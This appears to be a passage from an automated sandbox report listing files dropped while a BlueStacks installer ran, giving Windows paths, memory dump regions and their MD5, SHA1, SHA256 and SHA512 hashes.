| SHA256 | 3b136c884fb6e21acfcca33538f9b2e472f0eb83ae9a5a128cb1d5a6098b7f31 |
| SHA512 | f7690f5cbb08f2b7f801aecb24c826dee1fc08cd9d324b54359ab258be92577e72dcbab146bc4f55ab58dee0a01ff32070ef0f4a58385ba928f3f01bfe15d018 |
memory/6132-7145-0x0000000000240000-0x00000000002DA000-memory.dmp
memory/6132-7146-0x000000001AF10000-0x000000001AF78000-memory.dmp
memory/6132-7151-0x000000001C500000-0x000000001CA28000-memory.dmp
memory/6132-7152-0x000000001BAD0000-0x000000001BB08000-memory.dmp
memory/6132-7153-0x000000001BAA0000-0x000000001BAAE000-memory.dmp
memory/6132-7154-0x000000001FFA0000-0x000000001FFA8000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | a39f3f550f5a54ab4f8d99835fac52b7 |
| SHA1 | 8b49db0b026b24c5c417c337776a216bb3c870d0 |
| SHA256 | 8e9e182ea58b58846c3292d44074d3ddbfb227635ffc981c2dc91a0a779d28d4 |
| SHA512 | c7fc1bdab066940871657e47c8e31b8b6c9670e9d812ad596d60cc4b7f11f3429cdfad324cc013e9972019604126daabf02e932dcc9dd1561b2b91e44dbee9d6 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | c73eb93304dbdfa296b1f3dee7cd5d7e |
| SHA1 | 489b335d87c626663f5dd566b0848f426b71219c |
| SHA256 | e68430bdb6f04996e1732548738c08f8562c104a0fbb7daef3e0fd8abf000140 |
| SHA512 | 0b6f04de1c16e1383675dfef84dc8a636f4e9224c2ddde11e6a69d7f914d08cafe899b3d0bc892481ebf9e77f31e62ead91fc87e87f71508bc6094c259258f6c |
C:\Users\Admin\AppData\Local\Temp\nsr88F8.tmp\nsDui.dll
| MD5 | c40a4e327c43f7f51a20c38b1bae840f |
| SHA1 | 0f56fe0a357a71ef32cb138258366f743f8fc398 |
| SHA256 | ef94f69593fd376e52a46934629b634a6365590b7102cd45a2dfe45533139060 |
| SHA512 | f379dc79899744160f21d6c8f11341b2251e58c09dd510b035cf08ce8bfcd38e290b96af3baa656ec85be8753dca7e32d3b95098ced1cfb481142d454b178565 |
C:\Users\Admin\AppData\Local\Temp\nsr88F8.tmp\BgWorker.dll
| MD5 | 36c81676ada53ceb99e06693108d8cce |
| SHA1 | d31fa4aebd584238b3edc4768dd5414494610889 |
| SHA256 | a9e4f7ec65670d2ce375ffaf09b6d07f4cd531132ca002452287a4d540154a38 |
| SHA512 | 1300de7b3e1ac9e706e0aad0b70e3e2a21db8c860e05b314a52e63dd66b5dffdf6be1e38ab6ede13bfd3a64631cc909486bf4b1403e7d821e3b566edc514c63c |
C:\Users\Admin\AppData\Local\Temp\nsr88F8.tmp\System.dll
| MD5 | 959ea64598b9a3e494c00e8fa793be7e |
| SHA1 | 40f284a3b92c2f04b1038def79579d4b3d066ee0 |
| SHA256 | 03cd57ab00236c753e7ddeee8ee1c10839ace7c426769982365531042e1f6f8b |
| SHA512 | 5e765e090f712beffce40c5264674f430b08719940d66e3a4d4a516fd4ade859f7853f614d9d6bbb602780de54e11110d66dbb0f9ca20ef6096ede531f9f6d64 |
F:\BlueStacks X\image\LocalAPK\close_normal.svg
| MD5 | 3221ac69d7facd8aa90ffa15aea991b0 |
| SHA1 | e0571f30f4708ec78addc726a743679ca0f05e45 |
| SHA256 | 92aeae68e9e0973d9e0dc575941f1cb2e24afd0574341a46b870be7384eaa537 |
| SHA512 | 5e2de0abfe60a4db16ea5e8739260c19962fbfc60869a77bde6ab3547ad8ee3ad88e74e97da31fa23be096afddad018e431d152d6d0fa21a75357a11dacb1328 |
F:\BlueStacks X\image\LocalAPK\close_hover.svg
| MD5 | 76166804e6ce35e8a0c92917b8abc071 |
| SHA1 | 8bd38726a11a9633ac937b9c6f205ce5d36348b0 |
| SHA256 | 1bca2e912184b8168ee8961de68d1d839f4f9827fde6f48ab100fb61e82eff90 |
| SHA512 | 93c4f1af7e9f89091a207ab308e05ddd4c92406c039f7465d3b8aca7e0cc7a6c922a22e1eee2f5c88db5e89016ef69294b2a0905d7d6a90fd32835bc11929005 |
F:\BlueStacks X\image\LocalAPK\close_disabled.svg
| MD5 | e7fdf6a9c8cae1fc1108dc5a803a1905 |
| SHA1 | 2853f9ff5e63685ebb1449dcf693176b17e4ab60 |
| SHA256 | 8ee5aa84139b2ea5549f7272523aeb203d73954c5ccdcf6f7407bf1a3469f13e |
| SHA512 | a6388b24926934e20ccf7fcab41bd219dc6c0053428481d7f466bf89f26bf1a36fdff716a9ddd9ab268df73b04dff1449c6bac1f5c707e31ae2ee71c2087e0d9 |
F:\BlueStacks X\image\LocalAPK\close_pressed.svg
| MD5 | dfddf8d0788988c3e48fcbfb2a76cd20 |
| SHA1 | 463bb61f0012289e860c32f1885a3a8f57467f2e |
| SHA256 | 9585f41eb6202e89f2087266fa31852d7f41ca8cc659b907c96753fe165f937d |
| SHA512 | e708c5114c60f7574589d6a56c9faedda26ee4a40f0eeb25f5e12eadcf790f24fdbf393fa0aa6ad449b5337d625b092d6f8822472fa8a6ce1339aca59c50c3ca |
F:\BlueStacks X\BlueStacks X.exe
| MD5 | 62e4a0fff6c786b95c6ef4808e3e64b8 |
| SHA1 | da5be7cf6a5858c8afdffd716c966b561cb17942 |
| SHA256 | 217a85a670f12953bd4039ab0b89180b46e32b3ebe820877cf587e6bfcef0bbd |
| SHA512 | 19e72fbba7ae7aaafbef30658d3e66ccb6200a56dd6ffaeee1d476ddc1d8ea71ea01da2804e98605e819367b53681747f6129d1be332248c49134b909d1ae2ed |
C:\Users\Admin\AppData\Roaming\Microsoft\Spelling\en-US\default.dic
| MD5 | f3b25701fe362ec84616a93a45ce9998 |
| SHA1 | d62636d8caec13f04e28442a0a6fa1afeb024bbb |
| SHA256 | b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209 |
| SHA512 | 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\f_000039
| MD5 | e8e1f8273c10625d8b5e1541f8cab8fd |
| SHA1 | 18d7a3b3362fc592407e5b174a8fb60a128ce544 |
| SHA256 | 45870d39eb491375c12251d35194e916ace795b1a67e02841e1bbcb14f1a0e44 |
| SHA512 | ca77d40ec247d16bc50302f8b13c79b37ab1fcf81c1f8ab50f2fc5430d4fabc74f5845c781bd11bb55840184e6765c2f18b28af72e1f7800fe0bb0b1f3f23b24 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000152
| MD5 | 80f5ef733ad7c6422845d5b5f9772bee |
| SHA1 | 5139943cda266c32f59f2c04876f8cfde68ee48c |
| SHA256 | 40777a24fb7798b7d297ba926e7dc1946895bfcba4665392230e4bcabbff5c16 |
| SHA512 | b8b7f86dd5aa8ec582105ee8737610969cdf4d3efb233c8bd9ab85b695f26ae3422d298d5e2076d2fb0317ab0bbd9cb8f839a6c33de2e14b40570b81167c1301 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\f50b4d58e848d1dd_0
| MD5 | 006f9807c61426b39c9bbcc1896eb43c |
| SHA1 | 0b50f6c7d759bc8a42d3b3b200dc3fd90e0b30a8 |
| SHA256 | a793563fb8774fa37407aa70e9405a214c90d9c0952d7ddb24b8b45c64d6e9fe |
| SHA512 | 49bbba47a24f9c165196e563a56dfa86de509a48a927da33e8fc83acf4b201397d34e8967d4f49ebcd2714dc028b9b7b7e8844697227690c4c03c8a1190d44c8 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\26030e62953647cf_0
| MD5 | dbe48dc5640a47605386a0a3a98fad28 |
| SHA1 | d3e36a20059bb1521a3fe9d6325aba277db08628 |
| SHA256 | 575a84075e79699d7b4e0433e4bf498900f6f70fadcbb35dabbfb9c0fd45b3dc |
| SHA512 | 8618e72a8d6bae68568de9e387c070dba224c67142c285838ea9a01a7df87a47feeb2f0e4c1f923b1d22427095a706fa63b4ba19c6723c30ffe3ac818c8424d3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\df53bad28ea1e322_0
| MD5 | 9865789a8b31b36e53677e5dcac3506f |
| SHA1 | ead16a60c1b8b5362fdf6cdcd2fb9ea029e52e2b |
| SHA256 | 8e2ca5276d9a0999a5c5f1b8bc2fc98dfac78f2ce817e31ce743d88699441853 |
| SHA512 | 2271edaba5a09edafbda48c4721132617bd496d60ad615d227e38c7390f1111e7e3347b999ce6332fad4af82096941dce9a6d4184497067973468f712d437403 |
C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\Assets\exit_close.png
| MD5 | 26eb04b9e0105a7b121ea9c6601bbf2a |
| SHA1 | efc08370d90c8173df8d8c4b122d2bb64c07ccd8 |
| SHA256 | 7aaef329ba9fa052791d1a09f127551289641ea743baba171de55faa30ec1157 |
| SHA512 | 9df3c723314d11a6b4ce0577eb61488061f2f96a9746a944eb6a4ee8c0c4d29131231a1b20988ef5454b79f9475b43d62c710839ecc0a9c98324f977cab6db68 |
C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\Assets\minimize_progress.png
| MD5 | 1504b80f2a6f2d3fefc305da54a2a6c2 |
| SHA1 | 432a9d89ebc2f693836d3c2f0743ea5d2077848d |
| SHA256 | 2f62d4e8c643051093f907058dddc78cc525147d9c4f4a0d78b4d0e5c90979f6 |
| SHA512 | 675db04baf3199c8d94af30a1f1c252830a56a90f633c3a72aa9841738b04242902a5e7c56dd792626338e8b7eabc1f359514bb3a2e62bc36c16919e196cfd94 |
C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\Bootstrapper.exe
| MD5 | 84374e0d11c463624448d139f6c17dac |
| SHA1 | 2db5057242c766bf53748a9d23b9e0b18e699d1e |
| SHA256 | 218cf6acbc7a1a4b9fef00b8dc9660f2452099fbd0a6a459d364e61017cbae59 |
| SHA512 | 4b258f34250d2374a941a4902ee4b2d9454a8cd9f1b27772a7729f2f72607b4fca28e932d0aa2d36cad527f5b1166e6e32ea087da9df4506ea05c64148fa8d7b |
memory/432-20032-0x0000000000190000-0x00000000001B8000-memory.dmp
memory/432-20033-0x0000000002390000-0x0000000002474000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | bde00f0bf11f31da1deadd0d6245afee |
| SHA1 | 6d4abcc89f33575235c1adc833f59ec486b44e0d |
| SHA256 | 5c3c46b8ac3edc113686e0bd3ec0c0c7c70b5a84b50e6673f0392db958e7eb14 |
| SHA512 | 57dfe18532705ce93b5ef8711124192af1c7c0edc38063d49649670124a7bf84b1cb461fc546af5b8e74a8fa6e201ce58a8a8b7e1e7def9da7a6debbfd481191 |
memory/688-20047-0x0000000000710000-0x0000000000764000-memory.dmp
memory/688-20057-0x0000000020DF0000-0x0000000020E70000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS0A3602C5\HD-CheckCpu.exe
| MD5 | 81234fd9895897b8d1f5e6772a1b38d0 |
| SHA1 | 80b2fec4a85ed90c4db2f09b63bd8f37038db0d3 |
| SHA256 | 2e14887f3432b4a313442247fc669f891dbdad7ef1a2d371466a2afa88074a4c |
| SHA512 | 4c924d6524dc2c7d834bfc1a0d98b21753a7bf1e94b1c2c6650f755e6f265512d3a963bc7bc745351f79f547add57c37e29ba9270707edbf62b60df3a541bc16 |
C:\Users\Admin\AppData\Local\Temp\nspB42A.tmp\StdUtils.dll
| MD5 | c6a6e03f77c313b267498515488c5740 |
| SHA1 | 3d49fc2784b9450962ed6b82b46e9c3c957d7c15 |
| SHA256 | b72e9013a6204e9f01076dc38dabbf30870d44dfc66962adbf73619d4331601e |
| SHA512 | 9870c5879f7b72836805088079ad5bbafcb59fc3d9127f2160d4ec3d6e88d3cc8ebe5a9f5d20a4720fe6407c1336ef10f33b2b9621bc587e930d4cbacf337803 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 222d984f390d45cc9ac1a63c90cdfbc5 |
| SHA1 | 9c0bbaaaade0d410fe639f7e7394584f9cea60ed |
| SHA256 | fcc0150cd2db8e6ad6233544d7323ee5fd7b7cccc990efcdd5ffbb400b76e1ca |
| SHA512 | 6d84b83151f4a950eb5133392ffa79e5095c4c54c30618ef25d113528c333553de1c8bdf897c86faad3363320631282e0d16326f66c72f50da777c63aeee13bd |
C:\Users\Admin\AppData\Local\Temp\nspB42A.tmp\WinShell.dll
| MD5 | 1cc7c37b7e0c8cd8bf04b6cc283e1e56 |
| SHA1 | 0b9519763be6625bd5abce175dcc59c96d100d4c |
| SHA256 | 9be85b986ea66a6997dde658abe82b3147ed2a1a3dcb784bb5176f41d22815a6 |
| SHA512 | 7acf7f8e68aa6066b59ca9f2ae2e67997e6b347bc08eb788d2a119b3295c844b5b9606757168e8d2fbd61c2cda367bf80e9e48c9a52c28d5a7a00464bfd2048f |
C:\Users\Admin\AppData\Local\Temp\nspB42A.tmp\nsis7z.dll
| MD5 | 80e44ce4895304c6a3a831310fbf8cd0 |
| SHA1 | 36bd49ae21c460be5753a904b4501f1abca53508 |
| SHA256 | b393f05e8ff919ef071181050e1873c9a776e1a0ae8329aefff7007d0cadf592 |
| SHA512 | c8ba7b1f9113ead23e993e74a48c4427ae3562c1f6d9910b2bbe6806c9107cf7d94bc7d204613e4743d0cd869e00dafd4fb54aad1e8adb69c553f3b9e5bc64df |
C:\Users\Admin\AppData\Local\Temp\nspB42A.tmp\Registry.dll
| MD5 | 2b7007ed0262ca02ef69d8990815cbeb |
| SHA1 | 2eabe4f755213666dbbbde024a5235ddde02b47f |
| SHA256 | 0b25b20f26de5d5bd795f934c70447112b4981343fcb2dfab3374a4018d28c2d |
| SHA512 | aa75ee59ca0b8530eb7298b74e5f334ae9d14129f603b285a3170b82103cfdcc175af8185317e6207142517769e69a24b34fcdf0f58ed50a4960cbe8c22a0aca |
C:\Users\Admin\AppData\Local\Temp\nspB42A.tmp\System.dll
| MD5 | 0d7ad4f45dc6f5aa87f606d0331c6901 |
| SHA1 | 48df0911f0484cbe2a8cdd5362140b63c41ee457 |
| SHA256 | 3eb38ae99653a7dbc724132ee240f6e5c4af4bfe7c01d31d23faf373f9f2eaca |
| SHA512 | c07de7308cb54205e8bd703001a7fe4fd7796c9ac1b4bb330c77c872bf712b093645f40b80ce7127531fe6746a5b66e18ea073ab6a644934abed9bb64126fea9 |
C:\Users\Admin\AppData\Local\Temp\nspB42A.tmp\nsExec.dll
| MD5 | ec0504e6b8a11d5aad43b296beeb84b2 |
| SHA1 | 91b5ce085130c8c7194d66b2439ec9e1c206497c |
| SHA256 | 5d9ceb1ce5f35aea5f9e5a0c0edeeec04dfefe0c77890c80c70e98209b58b962 |
| SHA512 | 3f918f1b47e8a919cbe51eb17dc30acc8cfc18e743a1bae5b787d0db7d26038dc1210be98bf5ba3be8d6ed896dbbd7ac3d13e66454a98b2a38c7e69dad30bb57 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000158
| MD5 | 26de8b45afc27729849be0c409b79c03 |
| SHA1 | 0a10733bf2193837092d47f10ff04d7fa9705cee |
| SHA256 | 0804c255c1bac2280f20b920b5a218a058e55670b385c51452d6ed80e1766df5 |
| SHA512 | 19e620d557e8aaeb27ba5d600c45c40f5981a3eb5ab71464132c4ea68b55d9c2128f3b547a9071bd99d8b38ec46057ceda8642296c77a601d5e6250e25e7e28d |
C:\Users\Admin\AppData\Roaming\bluestacks-services\config.json
| MD5 | 831eb29211092b027443788e3859583e |
| SHA1 | f6982977a6b4fd4e8aa6aa6cab6f07f93fe62619 |
| SHA256 | 9726dd6ce243ddcae4e1deeee229f737869c7df81a96d08e00d9afb58f2edbd4 |
| SHA512 | 6ffc8940382294da299d0894acfbcc0cc500e4b128fb1ac35e5c24a8eb3d51a5004b18e23c4b6eb448bebc02e76ee84d0d22f5db5ea97e87a2a586e6175bbad5 |
C:\Users\Admin\AppData\Roaming\bluestacks-services\config.json.tmp-97184161126ea3d9
| MD5 | cc7a2ceb041cafc050187371a01f1908 |
| SHA1 | b481dfb546b95dd8b2a686f0784634a142a8c3ac |
| SHA256 | 1765d8dba844548bbddab2bf8b61719250c1788e28505601e17fab8ccee8480b |
| SHA512 | 2c77bff793ae3de973435f5cb510f7b3885722cdaf6f6f1f3b6dc215f7e620780c526a94bb819930fbb36047a18bf73823a901da0e1f1b4f2ceb9f90a2296d97 |
C:\Users\Admin\AppData\Roaming\bluestacks-services\config.json.tmp-97184162739f56f7
| MD5 | a0eff9e215e0b936bd1fb149052a3e64 |
| SHA1 | 81106b523ea55bb3c243eb8fd54299e97aadb3a9 |
| SHA256 | 8b5285c8ff508fba3727b2a09de38e69ce4d85c9e5d5fa82670a096ca1f26601 |
| SHA512 | 692fb62f04665a93334f29d2c2b13fc3ec02ab2046134b5239445af274c1dff0c9602b80d4942d734b844f28e23ffc4eb3481b7ebc64027fa82e99149d4f6d61 |
C:\Program Files\BlueStacks_nxt\7zr.exe
| MD5 | fbaba140f30a11e5ff4f97d921de6d45 |
| SHA1 | d12360b79d9fe7ddc5380a22539dc7d4768ff5f3 |
| SHA256 | 4889c0826c633c0291264d37834363be90ee39d07fcea228494ed151386dcb16 |
| SHA512 | cd18bb1b057b1b077fde372ca5f98701614b196b692ac42ec56e5b839535022d884a2cd9b6bf644a520c6f48f12f673574a24e60580c70c695067b66442ea7a5 |
C:\Program Files\BlueStacks_nxt\Assets\close_red_hover.png
| MD5 | 5ceab43aa527bc146f9453a1586ddf03 |
| SHA1 | 88ffb3cadccb54d4be3aabf31cf4d64210b5f553 |
| SHA256 | 7c625ae4668cc03e37e4ffc478b87eace06b49b77e71e3209f431c23d98acdd0 |
| SHA512 | 8a5c81c048fb7d02b246ed23a098ae5f95cdf6f4ca58fd3d30e4fe3001c933444310ca6391096cfaeed86b13f568236f84df4ea9a3d205c0677e31025616f19e |
C:\Program Files\BlueStacks_nxt\Assets\installer_bg.jpg
| MD5 | 3478e24ba1dd52c80a0ff0d43828b6b5 |
| SHA1 | b5b13bbf3fb645efb81d3562296599e76a2abac0 |
| SHA256 | 4c7471c986e16de0cd451be27d4b3171e595fe2916b4b3bf7ca52df6ec368904 |
| SHA512 | 5c8c9cc76d6dbc7ce482d0d1b6c2f3d48a7a510cd9ed01c191328763e1bccb56daeb3d18c33a9b10ac7c9780127007aa13799fa82d838de27fbe0a02ad98119d |
C:\Program Files\BlueStacks_nxt\Assets\close_red_click.png
| MD5 | 6db7460b73a6641c7621d0a6203a0a90 |
| SHA1 | d39b488b96f3e5b5fe93ee3eecb6d28bb5b03cf3 |
| SHA256 | d5a7e6fc5e92e0b29a4f65625030447f3379b4e3ac4bed051a0646a7932ce0cd |
| SHA512 | a0e6911853f51d73605e8f1a61442391fad25ff7b50a3f84d140d510fd98e262c971f130fb8a237a63704b8162c24b8440a5f235f51a5c343389f64e67c1c852 |
C:\Program Files\BlueStacks_nxt\BlueStacksUninstaller.exe.config
| MD5 | ca0a329097316832e4a6ea5d870c9268 |
| SHA1 | 4a36b93361d3dc9df9b00313f2c2b394be9e1e72 |
| SHA256 | 4b7df915d706af6459c38d75b09c5e14f951842ae0678078400f204ad1c7a7c2 |
| SHA512 | 51f9a874e84f130be4fa29fcc4bc934105318234b5dd9ceedaf569e3f0e6b38e29f3bec056044724476ae24295a510b16d8a737b994fd6f1268609defa315271 |
C:\Program Files\BlueStacks_nxt\Assets\unchecked_gray_hover.png
| MD5 | 62d7f14c26608f8392537d68f43dece1 |
| SHA1 | add4f30e7c3af4f7622e6bc55d960db612f3bb0a |
| SHA256 | a631e26bd5b6ea19c8c65b766a056c92ba8a47e1483768dcf12b05293c9a7a0d |
| SHA512 | e41210a78e6076954f75a2f73c0f7628e8604a09ecbb1d2ee0972741d4ef1d814b366828977c02944736b03ed116bc559a2ae47ddb7cbc6f4e54578c8263edf4 |
C:\Program Files\BlueStacks_nxt\Assets\unchecked_gray.png
| MD5 | e50df2a0768f7fc4c3fe8d784564fea3 |
| SHA1 | d1fc4db50fe8e534019eb7ce70a61fd4c954621a |
| SHA256 | 671f26795b12008fbea1943143f660095f3dca5d925f67d765e2352fd7ee2396 |
| SHA512 | c87a8308a73b17cbdd179737631fb1ba7fdaeb65e82263f6617727519b70a81266bb695867b9e599c1306ee2cf0de525452f77ce367ca89bf870ea3ae7189998 |
C:\Program Files\BlueStacks_nxt\Assets\powered_by_bs.png
| MD5 | 7a2e5c21140aa8269c2aafd207f5dbaa |
| SHA1 | 4e0d9e7e1b09e67eba10100d73dc51623517821e |
| SHA256 | 3d2afe5236ec813d9e8063bc43eb34b88c2155784e1bce19c6a533c32767af35 |
| SHA512 | 63f512559f2068a9702c7c527c126f6017cd8d1d16af52e41b884aa9a64ff4294a57243ec78c3a416f70fb6178a79877d68345357725ff92c935709a2ef8adde |
C:\Program Files\BlueStacks_nxt\Assets\installer_logo.png
| MD5 | e33432b5d6dafb8b58f161cf38b8f177 |
| SHA1 | d7f520887ce1bfa0a1abd49c5a7b215c24cbbf6a |
| SHA256 | 9f3104493216c1fa114ff935d23e3e41c7c3511792a30b10a40b507936c0d183 |
| SHA512 | 520dc99f3176117ebc28da5ef5439b132486ef67d02fa17f28b7eab0c59db0fa99566e44c0ca7bb75c9e7bd5244e4a23d87611a55c841c6f9c9776e457fb1cbf |
C:\Program Files\BlueStacks_nxt\Assets\close_red.png
| MD5 | 93216b2f9d66d423b3e1311c0573332d |
| SHA1 | 5efaebec5f20f91f164f80d1e36f98c9ddaff805 |
| SHA256 | d0b6d143642d356b40c47459a996131a344cade6bb86158f1b74693426b09bfb |
| SHA512 | 922a7292de627c5e637818556d25d9842a88e89f2b198885835925679500dfd44a1e25ce79e521e63c4f84a6b0bd6bf98e46143ad8cee80ecdbaf3d3bc0f3a32 |
C:\Program Files\BlueStacks_nxt\Assets\checked_gray_hover.png
| MD5 | ea22933e94c7ab813b639627f2b38286 |
| SHA1 | c5358c5cb7fb1a0744c775f8148c2376928fb509 |
| SHA256 | d7c79677d2ef897fa0ad1efc90e916c46da29f571208f78f24505603b7165c20 |
| SHA512 | ba447a1aedec49419e2b4a8de85c6047886f1a5ebb94f1c45e205a3780c6826f412a3892e97115b35e43839f43e346f3c72ffbf0c57d57f6d26b360ae61b3964 |
C:\Program Files\BlueStacks_nxt\Assets\checked_gray.png
| MD5 | ce144d2aab3bf213af693d4e18f87a59 |
| SHA1 | df59dc3dbba88bdc5ffc25f2e5e7b73ac3de5afa |
| SHA256 | d8e502fab00b0c6f06ba6abede6922ab3b423fe6f2d2f56941dabc887b229ad3 |
| SHA512 | 0f930edd485a0d49ef157f6cc8856609c087c91b77845adeb5cc8c8a80ebc7ec5416df351ffa1af780caad884dbb49dcc778b0b30de6fb7c85ffef22d7220ebe |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ccba5a5986c77e43.customDestinations-ms
| MD5 | 6fd308ffdae08aaff91a54bd8aa3b348 |
| SHA1 | 41adc7132ca7198090d1861b39a0829a28bf1449 |
| SHA256 | 17c2d9983a75cd6888ccc27e3e73e3b0601c4e50e6a9d3655833bb8ef598423c |
| SHA512 | 31cb208d40730c0c63dc73ce65c64e2505e9f251b63d523fc818a4e3baacbb3f7b34d8c236d42e25df6b65ca537b91d9a5fc5fa6736fd74881e63bcb1cae6b47 |
C:\Program Files\BlueStacks_nxt\HD-ForceGPU.exe
| MD5 | fa146b05afa8f9a7e331f7f845c423a7 |
| SHA1 | f0f3b0d8603e3de88d2a258c2746f52291be8351 |
| SHA256 | 2959f9c31a4b64c159611bb044195c11bf6b44e5be171b85ee3350a7fa40e33b |
| SHA512 | b0118b3d312267fa54937553b08edc32e9e1c9692fa04573da06b92d9c6b08b09c87ca7e8fdb27275b66f07d355238230f8573364079fe1d2f7e9787efb2ebc3 |
C:\Program Files\BlueStacks_nxt\HD-GLCheck.exe
| MD5 | f47c0bbad441b60285e236b9811e9752 |
| SHA1 | 2605282bfecca43d37904eed41aec2ab1d051a83 |
| SHA256 | 6421a0f711de4a47042c10d5868136ca1531ad05d85f7f6dd51398cce3ee2659 |
| SHA512 | 80b4954f72fbc4f2fa335eab89a1d878c3e893355a103ae9183ccb8cd3cc4125b73bbd69c0ff64973192e9b6ac289efe7f792ab2fb1305e402f39ad4f27ee7e9 |
C:\Program Files\BlueStacks_nxt\ProductLogo.ico
| MD5 | 169706218f98a42594a8c5c5a65771fe |
| SHA1 | b8ded94180212578d86a031eb71ef93dcffe1a26 |
| SHA256 | 3803045963af064936d7071c178de8e40854968b3d3f9171c57a182c869f3697 |
| SHA512 | 1c3f18ed0a24ffa78fe938826eb88531eb8be134d6f209b87d7af5d0e8c4829f01947d7b0048996b9755562bbb7f52e000bcd15d07d646cacb2989ac881ce448 |
C:\Windows\System32\storage.json
| MD5 | aa9ab927f7bc1bc84ada9519e58f9650 |
| SHA1 | a9515474d15f9cd43c4f1c30b2c7041d6c6b05c4 |
| SHA256 | 3cb23b535845ddd6fd6160dbb5fb6b14096161d3e632e0dc424a788875c85094 |
| SHA512 | b5bb47ea20ec20587e29dd3b6f8f68e7f8ac567e087b1e432320c3264769ae5e03b16693f5c9d4ba38a0c67d2f2a071b3ee7d104e75cbfaa0aa9342515f0085c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 8e11150783971f1d4695d2c5f0c71ec6 |
| SHA1 | 6b5e08dc8e788e73c54df382f81eae1ffac52ac9 |
| SHA256 | 5a4ce6db33cc6892f047839008bf5f1f2fe737589a017a08f635061ad3311e08 |
| SHA512 | 33909a1e71be07d822d9eb13261eae08220f069a65d4044c696411a524d4729b0c2600b220f8d9d6657a40102bac522cad889602582c4d9834463985fc19933c |
C:\Program Files\BlueStacks_nxt\resources\icudtl.dat
| MD5 | 03205e5952ea7b803839ecfe3bb000d6 |
| SHA1 | 74146e76e31fd1e75ae1c34fa8194bc291b34a40 |
| SHA256 | 8364e6c6bf5744357199de0de3f6ba30846ccda70288675b75059e6fd52241f3 |
| SHA512 | badb8843f9a483329cc4f559f95bd07a8cc1f9383e0e67dddacf74e586541067ca452a7fc28b63dcd28edc434c3be8ddc733dcbad0e06d973dafc99242f0b192 |
C:\Program Files\BlueStacks_nxt\resources\qtwebengine_resources.pak
| MD5 | aed2766cd70116ab1e0c430001a30b8f |
| SHA1 | a06c62b35c333412dd61c493d6a6520a8c04537c |
| SHA256 | 4ed3a10f1bbc40b9a2ce3b8cb6dab6f00fe922d0c0e1c6ab5adfd8617cec9389 |
| SHA512 | a1ca058b88c1a6839b2e329b08423ee115800864f580f832bbc4f4720f0965984f893d210437951bd79dcfd3b917137b0b2e8f381e50d2a1bc2de37ca5555961 |
C:\Program Files\BlueStacks_nxt\resources\qtwebengine_resources_100p.pak
| MD5 | 8615f18dea34c152e8aeb8f4e01fd17b |
| SHA1 | 032b7bab09943cc5c8a380b0aba29652d5539153 |
| SHA256 | e7e2cd13fa9fbaa33c537e8eecfd542e4ce4a621bc0b94159ef9e6e4541652a6 |
| SHA512 | 2a68ba854d473883f20e1a26375fa39b689cd39d2e284a963b07f25fa3eb6865ff3d8fea2241af23ffc731b83e20ec5b8147486de0a507e83413f75d71eab248 |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\bg.pak
| MD5 | 154217351d415b13dca71e28727902c4 |
| SHA1 | 096a1640b5e83a7b20afdfa7cfe2507b4128e0a5 |
| SHA256 | da4bb8513745180a0eb26228a315786a6bfb98d6594173491d25cdf9d59c5bcf |
| SHA512 | f1676a8b05c00588308c57b2290c00a6d844811e9ad4495ba94d62ae71a8c58d504ccd2697cfbf822fd5c2ce6423f76da8a901b4eae55095dc4b9667d9c2a8eb |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\ca.pak
| MD5 | a2c61a98fe7407ded9ece126c4c9d057 |
| SHA1 | c7d64d8bdc2fd9e7f1c62dff79e0e56e13f9cd69 |
| SHA256 | 4d583b753104ae98a1e5858bfe38dfa3195d477128441ca59c882d158d52ebf8 |
| SHA512 | 7522ee10397140b5eb45ec3d5cb32e9212a7d3cae8fbc377b270872aaf6c7077e7b13465f6005a85b5fdd4d2e86b1731c3366ddfb2e4bccae4ae2d1a178e0b1c |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\cs.pak
| MD5 | c0bb82986abc67281d8067e5f20625c7 |
| SHA1 | e7cc8888dd95d9edf226893f0e4c12e572bf6bf8 |
| SHA256 | 217718dd6d64f45da33db0629e6d56da8084ae0fd8123eafda909e662a5e5b50 |
| SHA512 | 80f4542345cc6e0d3589aeb76e0e5f19a824f2d3186d397c8fb71c1e9d6c056108df7f9a192a6515eb9ee43505b7844c0bf76b77596adcaa3c0ee783dd590ad9 |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\en-GB.pak
| MD5 | 06da37b66f4dbbe8c5ae1bd7e4addc99 |
| SHA1 | ac190bbb14b76d14143dcc088f460d1be2ba2886 |
| SHA256 | 60f87ec2b06329bdea7f835a61e9893fae147343f133caa2bfa5215797881ee0 |
| SHA512 | c436359e259c0a1cdc0dea1bb9ecd2bc22fe1124d76b9deac7e8c7751d97d66cbe61739aecef650908ed05363156fa11453490a9c9f23c74c683ac4e8c7c8c3e |
C:\Program Files\BlueStacks_nxt\translations\qtwebengine_locales\et.pak
| MD5 | 73e6f20f0c75a9beb72798167f8c6f91 |
